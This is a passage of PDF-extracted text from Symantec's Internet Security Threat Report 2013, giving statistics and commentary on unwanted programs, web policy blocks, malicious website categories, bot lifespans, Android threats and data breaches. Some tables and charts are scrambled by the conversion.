of Symantec.cloud Web <strong>security</strong> services. Underlying trends<br />
observed in the sample data provide a reasonable representation<br />
of overall malicious Web-based activity trends.
p. 74<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Commentary<br />
• It is sometimes the case that potentially unwanted<br />
programs are legitimate programs that have been<br />
installed as part of a drive-by download and the installation<br />
is performed without the permission of the user. This is<br />
typically when the third party behind the installation<br />
is being rewarded for the number of installations of a<br />
particular program, irrespective of whether the user has<br />
granted permission and is often without the knowledge of<br />
the original vendor, and may be in breach of their affiliate<br />
terms and conditions.<br />
• The most frequently blocked installation of potentially<br />
unwanted programs in 2012 was for the DirectDownload<br />
software.<br />
• Similarly, Counterclank 2 was ranked fourth in 2012, and was<br />
one of two Android-based potentially unwanted programs<br />
blocked. Due to the combined behavior of the applications<br />
and negative feedback from users who installed the<br />
applications, Symantec attempted to have Counterclank 3<br />
removed from the Android Market in 2012, but Google<br />
replied quickly, informing us the applications met their<br />
Terms of Service and they will not be removed. We expect in<br />
the future there may be many similar situations where we<br />
will inform users about an application, but the application<br />
will remain in the Google Android Market.<br />
• In 2012, three of the top 10 potentially unwanted programs<br />
were classified as spyware, compared with two in 2011.<br />
• Figure A.11 accounts for approximately 19 percent of all<br />
spyware and adware blocked in 2012. The remainder was<br />
blocked using generic detection techniques.
p. 75<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Analysis of Web Policy Risks from Inappropriate Use<br />
Background<br />
Many organizations implement an acceptable usage policy<br />
to limit employees’ use of Internet resources to a subset of<br />
websites that have been approved for business use. This enables<br />
an organization to limit the level of risk that may arise from<br />
users visiting inappropriate or unacceptable websites, such as<br />
those containing sexual images and other potentially illegal<br />
or harmful content. Often there will be varying degrees of<br />
granularity imposed on such restrictions, with some rules being<br />
applied to groups of users or rules that only apply at certain<br />
times of the day; for example, an organization may wish to<br />
limit employees access to video sharing websites to only Friday<br />
lunchtime, but may also allow any member of the PR and<br />
marketing teams access at any time of the day. This enables<br />
an organization to implement and monitor its acceptable usage<br />
policy and reduce its exposure to certain risks that may also<br />
expose the organization to legal difficulties.<br />
Data<br />
Figure A.12. Web Policies that Triggered Blocks, 2011–2012<br />
Source: Symantec.cloud<br />
Methodology<br />
Rank Top 10 Category 2012 2011 Change<br />
1 Advertisement and Pop-ups 31.8% 46.6% -14.8%<br />
2 social networking 24.1% 22.7% 1.4%<br />
3 streaming Media 9.0% 18.9% -9.9%<br />
4 chat 4.7% 3.2% 1.5%<br />
5 computing and <strong>internet</strong> 4.0%
p. 76<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Commentary<br />
• 31.8 percent of Web activity blocked through policy<br />
controls was related to advertisement and pop-ups. Webbased<br />
advertisements pose a potential risk though the use<br />
of “malvertisements,” or malicious advertisements. These<br />
may occur as the result of a legitimate online ad-provider<br />
being compromised and a banner ad being used to serve<br />
malware on an otherwise harmless website.<br />
• The second most frequently blocked traffic was categorized<br />
as social networking, accounting for 24.1 percent of<br />
policy-based filtering activity blocked, equivalent to<br />
approximately one in every four websites blocked. Many<br />
organizations allow access to social networking websites,<br />
but in some cases implement policies to only permit access<br />
at certain times of the day and block access at all other<br />
times.<br />
• Activity related to streaming media policies resulted in 9<br />
percent of policy-based filtering blocks in 2012. Streaming<br />
media is increasingly popular when there are major<br />
sporting events or high profile international news stories.<br />
This activity often results in an increased number of blocks,<br />
as businesses seek to preserve valuable bandwidth for other<br />
purposes. This rate is equivalent to one in every 11 websites<br />
blocked. The proportion of streaming media blocks made<br />
in 2012 was half of the 2011 figure, despite the London<br />
Olympics.
p. 77<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Analysis of Website Categories Exploited to Deliver Malicious Code<br />
Background<br />
As organizations seek to implement appropriate levels of control<br />
in order to minimize risk levels from uncontrolled Web access, it<br />
is important to understand the level of threat posed by certain<br />
classifications of websites and categories in order to provide<br />
better understanding of the types of legitimate websites that<br />
may be more susceptible to being compromised and potentially<br />
expose users to greater levels of risk.<br />
Web-based malware is increasingly more likely to be found on<br />
a legitimate website that has been compromised and used to<br />
host malicious content. It is therefore increasingly important<br />
that proactive <strong>security</strong> countermeasures are able to block<br />
such malware before it can reach a company’s network. This<br />
technique has also been employed in some targeted attacks,<br />
known as a “watering hole” attack, where the intended recipient<br />
is known to frequent a particular website and that website has<br />
been compromised.<br />
Data<br />
Figure A.13. Malicious Web Activity: Categories that Delivered Malicious Code, 2012<br />
Source: Symantec<br />
Rank<br />
Top 10 Most Frequently Exploited<br />
Categories of Websites<br />
1 Business 7.7%<br />
2 Hacking 7.6%<br />
3 technology and telecommunication 5.7%<br />
4 Blogging 4.5%<br />
5 shopping 3.6%<br />
6 Known Malware Domain 2.6%<br />
7 Hosting 2.3%<br />
8 Automotive 1.9%<br />
9 Health 1.7%<br />
10 educational 1.7%<br />
Methodology<br />
This metric assesses the classification of malicious websites<br />
blocked by users of Norton Safe Web technology. 4 Data is<br />
collected anonymously from over 50 million computers<br />
worldwide, where customers voluntarily contribute to this<br />
technology, including Norton Community Watch. Norton<br />
Safe Web is processing more than two billion real-time rating<br />
requests each day, and monitoring over 12 million daily.<br />
Reputation ratings are being tracked for more than 25 million<br />
websites.<br />
This metric provides an indication of the levels of infection of<br />
legitimate websites that have been compromised or abused for<br />
malicious purposes. The malicious URLs identified by the Safe<br />
Web technology were classified by category using the Symantec<br />
Rulespace5 technology. RuleSpace proactively categorizes<br />
websites into more than 80 categories in 17 languages.<br />
% of Total Number of<br />
Infected Websites
p. 78<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.14. Malicious Web Activity: Malicious Code by Number of Infections Per Site, 2012<br />
Source: Symantec<br />
Rank<br />
Top 10 Potentially Most<br />
Harmful Categories of<br />
Websites<br />
Average Number of<br />
Threats Found on Infected<br />
Website<br />
Major Threat Type<br />
Detected<br />
1 Pornography 4.4 trojans: 82%<br />
2 Placeholder 3.3 Pay Per click: 73%<br />
3 Plagiarism 3.2 Malware: 49%<br />
4 Automotive 3.1 Pay Per click: 66%<br />
5 Gore 3.0 Fake Antivirus: 74%<br />
6 Military 3.0 Malware: 53%<br />
7 Lifestyles 2.8 Fake Antivirus: 53%<br />
8 Automated Web Application 2.8 Malware: 100%<br />
9 Abortion 2.8 Malware: 79%<br />
10 Art and Museums 2.7 Fake Antivirus: 54%<br />
Figure A.15. Malicious Web Activity: Fake Antivirus by Category, 2012<br />
Source: Symantec<br />
Rank<br />
Top 10 Potentially Most<br />
Harmful Categories of<br />
Websites - Fake Antivlrus<br />
% of Threats Found<br />
Within Same Category<br />
1 religion 43% 4%<br />
2 sports 41% 5%<br />
3 shopping 39% 18%<br />
4 Health 34% 7%<br />
5 Business 29% 28%<br />
6 travel 29% 4%<br />
7 educational 22% 5%<br />
8 Blogging 20% 11%<br />
9<br />
technology and<br />
telecommunication<br />
15% 10%<br />
10 Hacking 9% 8%<br />
% of Fake Antivirus<br />
Attacks Found Within<br />
Top 10 Categories
p. 79<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.16. Malicious Web Activity: Browser Exploits by Category, 2012<br />
Source: Symantec<br />
Rank<br />
Top 10 Potentially Most<br />
Harmful Categories<br />
of Websites - Browser<br />
Exploits<br />
% of Threats Found<br />
Within Same Category<br />
1 Anonymizer 32% 8%<br />
2 Blogging 30% 61%<br />
3 Known Malware Domain 6% 7%<br />
4 Dynamic 4% 2%<br />
5 Hosting 4% 4%<br />
6 Hacking 2% 8%<br />
7 educational 2% 1%<br />
8 Business 1% 5%<br />
9<br />
technology and<br />
telecommunication<br />
1% 3%<br />
10 shopping 1% 1%<br />
Figure A.17. Malicious Web Activity: Social Networking Attacks by Category, 2012<br />
Source: Symantec<br />
Rank<br />
Top 10 Potentially Most Harmful<br />
Categories of Websites - Social<br />
Networking<br />
1 Blogging 43%<br />
2 Hacking 14%<br />
3 Dynamic 11%<br />
4 Business 5%<br />
5 Hosting 4%<br />
% of Browser Exploits<br />
Found Within<br />
Top 10 Categories<br />
% Used to Deliver Social Networking<br />
Attacks
p. 80<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Commentary<br />
• Approximately 63 percent of websites used to distribute<br />
malware were identified as legitimate, compromised<br />
websites that could be classified, an increase of two<br />
percentage points compared with 2011. This figure excludes<br />
URLs that contained just an IP address and did not include<br />
general domain parking and pay-per-click websites.<br />
• 7.7 percent of malicious website activity was classified in<br />
the Blogging category.<br />
• Websites classified as pornography were found to host the<br />
greatest number of threats per site than other categories,<br />
with an average of 4.4 threats per website, the majority of<br />
which related to Trojans (82 percent).<br />
• Analysis of websites that were used to deliver drive-by fake<br />
antivirus attacks revealed that 4 percent of threats found<br />
on compromised religion sites were related to fake antivirus<br />
software. 43 percent of fake antivirus attacks were found on<br />
compromised religion sites. 28 percent of attacks found on<br />
compromised business sites were fake antivirus.<br />
• Analysis of websites that were used to deliver attacks using<br />
browser exploits revealed that 8 percent of threats found<br />
on compromised anonymizer sites were related to browser<br />
exploits. 32 percent of browser exploit attacks were found<br />
on compromised anonymizer sites. 59 percent of browser<br />
exploits were found on compromised blogging sites.<br />
• 43 percent of attacks used on social networking websites<br />
were related to malware hosted on compromised blogging<br />
sites. This is where a URL hyperlink for a compromised<br />
website is shared on a social network. Websites dedicated to<br />
the discussion of hacking accounted for 14 percent of social<br />
networking attacks.<br />
• The Hacking category is used to classify websites<br />
that promote or provide the means to practice illegal<br />
or unauthorized acts of computer crime or related<br />
programming skills.<br />
• The Dynamic category is used to classify websites that have<br />
been found to contain both appropriate and inappropriate<br />
user-generated content, such as social networking or<br />
blogging websites. Also, websites in which the page content<br />
changes based how the user is interacting with it<br />
(for example, an Internet search).<br />
• The Known Malware Domain category are sites that have<br />
no specific broad classification, but where the domain<br />
was found to either contain malware or take advantage of<br />
other exploits to deliver adware, spyware or malware. For<br />
example, underground websites that may be used to openly<br />
discuss and share malcode and related research.<br />
• The Placeholder category refers to any domain name that is<br />
registered, but may be for sale or has recently expired and<br />
is redirected to a domain parking page.
p. 81<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Bot-infected Computers<br />
Background<br />
Bot-infected computers, or bots, are programs that are covertly<br />
installed on a user’s machine in order to allow an attacker to<br />
control the targeted system remotely through a communication<br />
channel, such as Internet relay chat (IRC), P2P, or HTTP. These<br />
channels allow the remote attacker to control a large number<br />
of compromised computers over a single, reliable channel in a<br />
botnet, which can then be used to launch coordinated attacks.<br />
Bots allow for a wide range of functionality and most can be<br />
updated to assume new functionality by downloading new code<br />
and features. Attackers can use bots to perform a variety of<br />
tasks, such as setting up denial-of-service (DoS) attacks against<br />
an organization’s website, distributing spam and phishing<br />
attacks, distributing spyware and adware, propagating malicious<br />
code, and harvesting confidential information that may be used<br />
in identity theft from compromised computers—all of which<br />
can lead to serious financial and legal consequences. Attackers<br />
favor bot-infected computers with a decentralized C&C6 model<br />
because they are difficult to disable and allow the attackers to<br />
hide in plain sight among the massive amounts of unrelated<br />
traffic occurring over the same communication channels, such<br />
as P2P. Most importantly, botnet operations can be lucrative for<br />
their controllers because bots are also inexpensive and relatively<br />
easy to propagate.<br />
Methodology<br />
A bot-infected computer is considered active on a given day if<br />
it carries out at least one attack on that day. This does not have<br />
to be continuous; rather, a single such computer can be active<br />
on a number of different days. A distinct bot-infected computer<br />
is a distinct computer that was active at least once during the<br />
period. Of the bot-infected computer activities that Symantec<br />
tracks, they can be classified as actively attacking bots or bots<br />
that send out spam; for example, spam zombies.<br />
Distributed denial-of-service (DDoS) campaigns may not always<br />
be indicative of bot-infected computer activity, DDoS activity can<br />
occur without the use of bot-infected computers. For example,<br />
systems that participated in the high-profile DDoS Operation<br />
Payback attacks in 2010 and 2011 used publically available<br />
software such as Low Orbit Ion Cannon (LOIC) in a coordinated<br />
effort to disrupt many businesses, website operations. Users<br />
sympathetic to the Anonymous cause could voluntarily<br />
download the free tool from the Web and participate en masse in<br />
a coordinated DDoS campaign and required very little technical<br />
knowledge.<br />
The analysis reveals the average lifespan of a bot-infected<br />
computer for the highest populations of bot-infected computers.<br />
To be included on the list, the geography must account for at<br />
least 0.1 percent of the global bot population.
p. 82<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Data<br />
Figure A.18. Table of Top 10 Bot Locations by Average Lifespan of Bot, 2011–2012<br />
Source: Symantec<br />
Rank -<br />
2012<br />
Geography<br />
Average Lifespan<br />
of Bot (Days) -<br />
2012<br />
% of World Bots -<br />
2012<br />
Average Lifespan<br />
of Bot (Days) -<br />
2011<br />
% of World Bots -<br />
2011<br />
1 romania 24 0.16% 29 0.14% 1<br />
2 Bulgaria 17 0.10% 14 0.13% 2<br />
3 united states 13 15.34% 13 12.56% 3<br />
4 indonesia 12 0.12% 10 0.14% 6<br />
5 israel 11 1.34% 5 1.64% 29<br />
6 egypt 10 0.11% 8 0.11% 14<br />
7 Korea, south 10 0.99% 12 0.99% 4<br />
8 Pakistan 10 0.12% 9 0.25% 10<br />
9 Philippines 10 0.16% 10 0.18% 6<br />
10 ukraine 10 0.15% 10 0.20% 6<br />
Commentary<br />
• Bots located in Romania were active for an average of 24<br />
days in 2012, compared with 29 days in 2011; 1 in 622 of<br />
bots were located in Romania, compared with 1 in 737 in<br />
2011.<br />
• It takes almost twice as long to identify and clean up a botinfected<br />
computer in Romania than in the United States,<br />
although the number of infections in the United States is<br />
on a magnitude of more than a hundred times greater than<br />
that of Romania. One factor contributing to this disparity<br />
may be a low level of user-awareness of the issues involved<br />
combined with the lower availability of remediation<br />
guidance and support tools in the Romanian language.<br />
• In the United States, which was home to 1 in 7 (15 percent)<br />
of global bot-infected computers, the average lifespan for a<br />
bot was 13 days, unchanged from 2011.<br />
• All other countries outside the top ten had a lifespan<br />
of 9 days or less. The overall average lifespan was 6 days.<br />
• Additionally, 68 percent of bots were controlled using<br />
HTTP-based command and control channels, compared<br />
with 65 percent in 2011.<br />
Rank - 2011
p. 83<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Analysis of Mobile Threats<br />
Background<br />
Since the first smartphone arrived in the hands of consumers,<br />
speculation about threats targeting these devices has abounded.<br />
While threats targeted early “smart” devices such as those based<br />
on Symbian and Palm OS in the past, none of these threats<br />
ever became widespread and many remained proof of concept.<br />
Recently, with the growing uptake in smartphones and tablets,<br />
and their increasing connectivity and capability, there has<br />
been a corresponding increase in attention, both from threat<br />
developers and <strong>security</strong> researchers.<br />
While the number of immediate threats to mobile devices<br />
remains relatively low in comparison to threats targeting PCs,<br />
there have been new developments in the field. And as malicious<br />
code for mobile begins to generate revenue for malware authors,<br />
there will be more threats created for these devices, especially as<br />
people increasingly use mobile devices for sensitive transactions<br />
such as online shopping and banking.<br />
As with desktop computers, the exploitation of a vulnerability<br />
can be a way for malicious code to be installed on a mobile device.<br />
Data<br />
Figure A.19. Android Mobile Threats: Newly Discovered Malicious Code, 2011–2012<br />
Source: Symantec<br />
24<br />
22<br />
20<br />
18<br />
16<br />
14<br />
12<br />
10<br />
8<br />
6<br />
4<br />
2<br />
0<br />
JAN<br />
APR<br />
JUL<br />
OCT<br />
JAN<br />
APR<br />
Methodology<br />
In 2012, there was a significant number of vulnerabilities<br />
reported that affected mobile devices. Symantec documented<br />
415 vulnerabilities in mobile device operating systems in 2012,<br />
compared to 315 in 2011 and 163 in 2010; an increase of 32<br />
percent.<br />
Symantec tracks the number of threats discovered against<br />
mobile platforms by tracking malicious threats identified by<br />
Symantec’s own <strong>security</strong> products and confirmed vulnerabilities<br />
documented by mobile vendors.<br />
Currently, most malicious code for mobile devices consists of<br />
Trojans that pose as legitimate applications. These applications<br />
are uploaded to mobile application (“app”) marketplaces in the<br />
hope that users will download and install them, often trying to<br />
pass themselves off as legitimate apps or games. Attackers have<br />
also taken popular legitimate applications and added additional<br />
code to them. Symantec has classified the types of threats into a<br />
variety of categories based on their functionality.<br />
JUL<br />
OCT<br />
TREND<br />
2011 2012
p. 84<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.20. Android Mobile Threats: Cumulative Number of Malware Families, 2010–2012<br />
Source: Symantec<br />
200<br />
180<br />
160<br />
140<br />
120<br />
100<br />
80<br />
60<br />
40<br />
20<br />
0<br />
JAN<br />
DEC JAN<br />
DEC<br />
2011 2012
p. 85<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.21. Mobile Threats: Malicious Code by Type, 2012<br />
Source: Symantec<br />
Figure A.22. Mobile Threats: Malicious Code by Type – Additional Detail, 2012<br />
Source: Symantec<br />
Steals Device Data 27<br />
Spies on User<br />
Sends Premium SMS<br />
Downloader<br />
Back Door<br />
Tracks Location<br />
Modifies Settings<br />
Spam<br />
Steals Media<br />
Elevates Privileges<br />
Banking Trojan<br />
SEO Poisoning<br />
Adware/Annoyance<br />
DDoS Utility<br />
Hacktool<br />
32%<br />
Steal Information<br />
25%<br />
Traditional Threats<br />
15%<br />
Track User<br />
3<br />
2<br />
2<br />
3<br />
2<br />
p. 86<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.23. Documented Mobile Vulnerabilities, 2012<br />
Source: Symantec<br />
140<br />
120<br />
100<br />
80<br />
60<br />
40<br />
20<br />
0<br />
9<br />
JAN<br />
46<br />
FEB<br />
121<br />
MAR<br />
18<br />
APR<br />
MAY<br />
JUN<br />
JUL<br />
AUG<br />
Platform Documented Vulnerabilities %<br />
Apple iOs/iPhone/iPad 387 93.3%<br />
Android 13 3.1%<br />
BlackBerry 13 3.1%<br />
nokia 0 0%<br />
WebOs 0 0%<br />
Windows Mobile 2 0.5%<br />
TOTAL 415<br />
36<br />
23<br />
72<br />
1<br />
77<br />
SEP<br />
4 5 3<br />
OCT<br />
NOV<br />
DEC
p. 87<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
The following are specific definitions of each subcategory:<br />
• Collects Device Data gathers information that is specific<br />
to the functionality of the device, such as IMEI, IMSI,<br />
operating system, and phone configuration data.<br />
• Spies on User intentionally gathers information from the<br />
device to keep monitor a user, such as phone logs and SMS<br />
messages, and sends them to a remote source.<br />
• Sends Premium SMS sends SMS messages to premium-rate<br />
numbers that are charged to the user’s mobile account.<br />
• Downloader can download other risks on to the<br />
compromised device.<br />
• Back door opens a back door on the compromised device,<br />
allowing attackers to perform arbitrary actions.<br />
• Tracks Location gathers GPS information from the device<br />
specifically to track the user’s location.<br />
• Modifies Settings changes configuration settings on the<br />
compromised device.<br />
• Spam sends spam email messages from the compromised<br />
device.<br />
• Steals Media sends media, such as pictures, to a remote<br />
source.<br />
• Elevates Privileges attempts to gain privileges beyond those<br />
laid out when installing the app bundled with the risk.<br />
• Banking Trojan monitors the device for banking<br />
transactions, gathering the sensitive details for further<br />
malicious actions.<br />
• SEO Poisoning periodically sends the phone’s browser to<br />
predetermined URLs in order to boost search rankings.<br />
• Adware/Annoyance contains mobile adware that uses<br />
techniques to place advertising in the device’s photo<br />
albums and calender entries, and may push messages to the<br />
notification bar. It may even replace the default ringtone<br />
with an ad.<br />
Apps with malicious intentions can present serious risks to<br />
users of mobile devices. These metrics show the different<br />
functions that these bad mobile apps performed during the<br />
year. The data was compiled by analyzing the key functionality<br />
of malicious mobile apps. Symantec has identified five primary<br />
mobile risk types:<br />
• Collect Data. Most common among bad mobile apps was the<br />
collection of data from the compromised device. This was<br />
typically done with the intent to carry out further malicious<br />
activities, in much the way an information-stealing Trojan<br />
might. This includes both device- and user-specific data,<br />
ranging from configuration data to banking details. This<br />
information can be used in a number of ways, but for the<br />
most part, it is fairly innocuous with IMEI 7 and IMSI 8<br />
numbers taken by attackers as a way to uniquely identify<br />
a device. More concerning is data gathered about the<br />
device software, such as operating system (OS) version or<br />
applications installed, to carry out further attacks (say, by<br />
exploiting a software vulnerability). Rarer, but of greatest<br />
concern is when user-specific data, such as banking<br />
details, is gathered in an attempt to make unauthorized<br />
transactions. While this category covers a broad range of<br />
data, the distinction between device and user data is given<br />
in more detail in the subcategories below.<br />
• Track User. The next most common purpose was to track a<br />
user’s personal behavior and actions. These risks take data<br />
specifically to spy on the individual using the phone. This<br />
is done by gathering up various communication data, such<br />
as SMS messages and phone call logs, and sending them to<br />
another computer or device. In some instances they may<br />
even record phone calls. In other cases these risks track GPS<br />
coordinates, essentially keeping tabs on the location of the<br />
device (and their user) at any given time. Gathering pictures<br />
taken with the phone also falls into this category.<br />
• Send Content. The third-largest group of risks is bad apps<br />
that send out content. These risks are different from the<br />
first two categories because their direct intent is to make<br />
money for the attacker. Most of these risks will send a text<br />
message to a premium SMS number, ultimately appearing<br />
on the mobile bill of the device’s owner. Also within this<br />
category are risks that can be used as email spam relays,<br />
controlled by the attackers and sending unwanted emails<br />
from addresses registered to the device. One threat in this<br />
category constantly sent HTTP requests in the hopes of<br />
bumping certain pages within search rankings.<br />
• Traditional Threats. The fourth group contains more<br />
traditional threats, such as back doors and downloaders.<br />
Attackers often port these types of risks from PCs to mobile<br />
devices.<br />
• Change Settings. Finally, there are a small number of risks<br />
that focus on making configuration changes. These types<br />
attempt to elevate privileges or simply modify various<br />
settings within the operating system. The goal for this<br />
final group seems to be to perform further actions on the<br />
compromised devices.
p. 88<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Commentary<br />
In 2012, Android users especially were potentially vulnerable to<br />
a wider variety of threats, predominantly due to the widespread<br />
popularity of the Android platform. However, very few of these<br />
threats have utilized vulnerabilities in the Android OS in order<br />
to spread. Rather, the threats tend to masquerade as legitimate<br />
apps and attempt to coerce the user into installing them.<br />
Exploits accounted for a minority of the infections, but there<br />
are certainly more of them for older platforms (for example,<br />
2.x.x), so a lot of these users were more vulnerable to malicious<br />
apps that carry these exploits and use then to obtain “root”<br />
super-user privileges (examples of threats that do this include<br />
Basebridge, Bmaster, Gonfu.D, Gmaster, and Zeahache).<br />
There are two important distinctions between older and newer<br />
Android versions regarding <strong>security</strong> features:<br />
• In response to feedback from users annoyed by advertising<br />
platforms that push notifications to the status bar, Google<br />
added a feature in 4.x to identify the app that generates a<br />
certain notification and even block that app from pushing<br />
notifications.<br />
• Owing to the rise of threats that silently send premium text<br />
messages (Opfake, Premiumtext, Positmob, Rufraud, etc.),<br />
Google added in 4.2 a feature to prompt the user to confirm<br />
sending such premium text messages (they compiled a<br />
list of ranges of short-code numbers for many countries).<br />
This can be very helpful in protecting most users, however<br />
Android 4.2 devices account only for 1.4 percent of users at<br />
the time of writing. 9<br />
We haven’t seen a large number of Android vulnerabilities in<br />
2012, and phone manufacturers pushed (over the air) updates<br />
for the more serious ones. The Android ecosystem makes it<br />
more challenging to keep everyone up to date. Google controls<br />
the official reference platform that works out of the box only<br />
on Nexus devices. From there each manufacturer modifies<br />
and releases its own platform updates, which are picked up by<br />
mobile network operators, which in turn also customize for their<br />
platforms.<br />
This makes it very difficult for any change coming from Google<br />
to be pushed out quickly to in-the-field devices. Any change to<br />
the platform requires thorough testing, which is performed by<br />
each manufacturer and operator, all adding to the time required<br />
to deploy to the end users.<br />
Having so many device models also multiplies the amount of<br />
resources all these companies have to allocate for each update,<br />
which may partly explain why these updates are infrequently<br />
released. Another factor is that the newest platforms are<br />
optimized for the latest, more powerful hardware, which could<br />
actually degrade the performance on older models if pushed<br />
out universally. Of course, some commentators argue that<br />
manufacturers and operators are not really motivated to release<br />
so many updates in order to encourage people to purchase<br />
the newer phones, but we cannot comment on this. For most<br />
exploits in the OS, Google quickly releases the fixes, but it still<br />
entails a long time for most users to receive the appropriate fix<br />
for their device from their network operators.<br />
Some exploits are not in the original OS itself, but in the custom<br />
modifications made by manufacturers, such as the recent<br />
Samsung exploit for Galaxy S2/S3, Note, etc. Although they were<br />
quick to fix it, the fix still had to propagate through network<br />
operators to reach users. In the event that a major vulnerability<br />
appeared that was being exploited in huge numbers of older<br />
versions of Android, we don’t think Google (or the phone<br />
manufacturers) would have any choice but to release an OTA<br />
patch for it. The question is would it reach all Android users and<br />
how long would it take?<br />
Tighter control from Google over the platform may resolve some<br />
of the “fragmentation” issues, but this could have a knock-on<br />
effect and in turn impact the relationship it has with the device<br />
manufacturers. And there is an argument about drawing a line<br />
and forcing a cut-off point for older Android users, but it is<br />
usually the manufacturers that determine this; they are the ones<br />
to say whether or not they will continue to upgrade a particular<br />
model to support a newer version of Android. As devices pass<br />
their end-of-life support period, they may still be usable and<br />
adequately functional, but they are unlikely to receive support<br />
from the manufacturers in terms of updates and patches. In<br />
general, Google would only have to win from having most users<br />
using up-to-date versions of Android, but with the current<br />
model, they may not have much say in the matter.
p. 89<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Data Breaches that Could Lead to Identity Theft<br />
Background<br />
Hacking continued to be the primary way data breaches occurred<br />
in 2012, in much the same way as it was in 2011. However, where<br />
politically motivated hacktivism in 2011 resulted in some of the<br />
biggest data breaches we’ve seen, such activity waned somewhat<br />
in 2012. This is most apparent when looking at the biggest<br />
caches of stolen identities. In 2011, there were five data breaches<br />
that netted hackers 10 million or more identities, the largest of<br />
which was a massive breach of 70 million identities. In contrast,<br />
2012 saw only one breach larger than 10 million identities.<br />
As a result the overall average size of breaches has dropped<br />
significantly, down from 1.1 million to 604,826 identities per<br />
breach.<br />
That’s not to say that the threat posed by data breaches has<br />
dropped in the last year. While the average size has declined, the<br />
medium number of identities stolen is up, and significantly at<br />
that. Where the median number of identities stolen was 2,400<br />
per breach in 2011, this number is up to 8,350 in 2012. That’s<br />
an increase of around 3.5 times. Using the median is a useful<br />
measure because it ignores the extremes, the rare events that<br />
resulted in large numbers of identities being exposed, and is<br />
more representative of the underlying trend.<br />
There were many high-profile hacking breaches last year that<br />
received lots of media attention for obvious reasons. Hacking<br />
can undermine institutional confidence in a company, and<br />
loss of personal data can result in damage to an organizations<br />
reputation. Despite the media hype around these breaches,<br />
hacking came in second to old-fashioned theft as the greatest<br />
source of data breaches last year according to the Norton<br />
Cybercrime Index data. 10 In the event of a data breach, many<br />
countries have existing data breach notification legislation<br />
that regulates the responsibilities of organizations conducting<br />
business after a data breach has occurred.<br />
Methodology<br />
The data for the data breaches that could lead to identity theft<br />
is procured from the Norton Cybercrime Index (CCI). The Norton<br />
CCI is a statistical model that measures the levels of threats,<br />
including malicious software, fraud, identity theft, spam,<br />
phishing, and social engineering daily. The majority of the<br />
Norton CCI’s data comes from Symantec’s Global Intelligence<br />
Network, one of the industry’s most comprehensive sources of<br />
intelligence about online threats. 11 The data breach section of<br />
the Norton CCI is derived from data breaches that have been<br />
reported by legitimate media sources and have exposed personal<br />
information, including name, address, Social Security numbers,<br />
credit card numbers, or medical history. Using publicly available<br />
data, the Norton CCI determines the sectors that were most<br />
often affected by data breaches, as well as the most common<br />
causes of data loss.<br />
The sector that experienced the loss along with the cause of loss<br />
that occurred is determined through analysis of the organization<br />
reporting the loss and the method that facilitated the loss.<br />
The data also reflects the severity of the breach by measuring<br />
the total number of identities exposed to attackers, using the<br />
same publicly available data. An identity is considered to be<br />
exposed if personal or financial data related to the identity<br />
is made available through the data breach. Data may include<br />
names, government-issued identification numbers, credit card<br />
information, home addresses, or email information. A data<br />
breach is considered deliberate when the cause of the breach is<br />
due to hacking, insider intervention, or fraud. A data breach is<br />
considered to be caused by hacking if data related to identity<br />
theft was exposed by attackers, external to an organization,<br />
gaining unauthorized access to computers or networks. (Hacking<br />
is an intentional act with the objective of stealing data that can<br />
be used for purposes of identity theft or other fraud.)<br />
It should be noted that some sectors may need to comply with<br />
more stringent reporting requirements for data breaches than<br />
others do. For instance, government organizations are more likely<br />
to report data breaches, either due to regulatory obligations or<br />
in conjunction with publicly accessible audits and performance<br />
reports. 12 Conversely, organizations that rely on consumer<br />
confidence may be less inclined to report such breaches for fear<br />
of negative consumer, industry, or market reaction. As a result,<br />
sectors that are not required or encouraged to report<br />
data breaches may be under-represented in this data set.
p. 90<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.24. Timeline of Data Breaches Showing Identities Breached in 2012, Global<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
SUM OF IDENTITIES BREACHED (MILLIONS)<br />
35<br />
30<br />
25<br />
20<br />
15<br />
10<br />
5<br />
31<br />
JAN<br />
1<br />
FEB<br />
.1<br />
MAR<br />
3<br />
APR<br />
1<br />
MAY<br />
8<br />
JUN<br />
13<br />
JUL<br />
4<br />
AUG<br />
SEP<br />
12<br />
6<br />
OCT<br />
12<br />
NOV<br />
DEC<br />
INCIDENTS SUM<br />
Data and Commentary for Data Breaches that Could Lead to Identity Theft by Sector<br />
Figure A.25. Data Breaches that Could Lead to Identity Theft (Top 10 Sectors by Number of Data Breaches)<br />
